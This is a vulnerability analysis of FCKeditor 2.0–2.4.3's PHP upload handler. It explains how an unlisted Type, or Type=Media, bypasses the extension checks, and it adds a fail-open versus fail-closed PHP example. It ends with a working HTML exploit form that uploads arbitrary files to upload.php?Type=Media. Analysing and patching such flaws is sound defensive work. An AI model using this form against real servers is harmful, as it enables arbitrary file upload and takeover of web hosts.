FCKeditor 2.0-2.4.3 Vulnerability Analysis
Date: 2010-11-11 Source: grabz
Published: 2010-11-11
Author: grabz
Affected versions: FCKeditor 2.0-2.4.3
Official site: http://sourceforge.net/projects/fckeditor/
Vulnerability analysis:
version 2.0 - 2.2:
FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#
#// Get the allowed and denied extensions arrays.
#$arAllowed = $Config['AllowedExtensions'][$sType] ;
#$arDenied = $Config['DeniedExtensions'][$sType] ;
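Here, sending any Type other than File, Flash, Image or Text lets us upload a file with the ".php" extension, since $arAllowed and $arDenied are then looked up under a key that the configuration does not define.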
version 2.3.0 - 2.4.3:
FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#// Check if it is an allowed type.
#if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
# SendResults( 1, '', '', 'Invalid type specified' ) ;
#// Get the allowed and denied extensions arrays.
#$arAllowed = $Config['AllowedExtensions'][$sType] ;
#$arDenied = $Config['DeniedExtensions'][$sType] ;
This code does filter on Type, but config.php defines neither
$Config['AllowedExtensions']['Media'] nor
$Config['DeniedExtensions']['Media'].
When the Type sent is Media, arbitrary files can be uploaded.
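The failure mode in both version ranges is a check that fails open when the extension lists for the requested Type are missing. The following is an added example, not FCKeditor's code: it models that fail-open behaviour next to a fail-closed check. The function names and the sample $config values are hypothetical, and the way the missing lists are consumed in the fail-open model is an assumption.

```php
<?php
// Constructed sample config; as the page describes, there are no 'Media' entries.
$config = [
    'AllowedExtensions' => [
        'File'  => [],
        'Image' => ['jpg', 'gif', 'jpeg', 'png'],
        'Flash' => ['swf', 'fla'],
    ],
    'DeniedExtensions' => [
        'File'  => ['php', 'php3', 'phtml', 'asp', 'cgi'],
        'Image' => [],
        'Flash' => [],
    ],
];

// Fail-open model (assumption): a missing or empty list means "no restriction".
function allowed_fail_open(array $config, string $type, string $ext): bool
{
    $allowed = $config['AllowedExtensions'][$type] ?? [];
    $denied  = $config['DeniedExtensions'][$type] ?? [];
    if (count($allowed) > 0 && !in_array($ext, $allowed, true)) {
        return false;
    }
    if (count($denied) > 0 && in_array($ext, $denied, true)) {
        return false;
    }
    return true;
}

// Fail-closed check: the Type must have a non-empty allow list in the config
// and the lower-cased final extension must be on it. Deny lists are not consulted.
function allowed_fail_closed(array $config, string $type, string $filename): bool
{
    $allowed = $config['AllowedExtensions'][$type] ?? null;
    if (!is_array($allowed) || count($allowed) === 0) {
        return false; // unknown or unconfigured Type: reject
    }
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allowed, true);
}

// Constructed inputs: an unconfigured Type, an unknown Type, and two Image cases.
foreach ([['Media', 'a.php'], ['Other', 'a.php'], ['Image', 'a.PNG'], ['Image', 'a.php']] as [$t, $f]) {
    $ext = strtolower(pathinfo($f, PATHINFO_EXTENSION));
    printf("%-6s %-6s fail-open=%-5s fail-closed=%s\n", $t, $f,
        var_export(allowed_fail_open($config, $t, $ext), true),
        var_export(allowed_fail_closed($config, $t, $f), true));
}
```

With the fail-closed check, a Type such as File that relies only on a deny list is rejected until it is given an explicit allow list.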
Exploit
<form enctype="multipart/form-data" action="http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> <input name="NewFile" type="file"> <input type="submit" value="submit"> </form>
Tags: file upload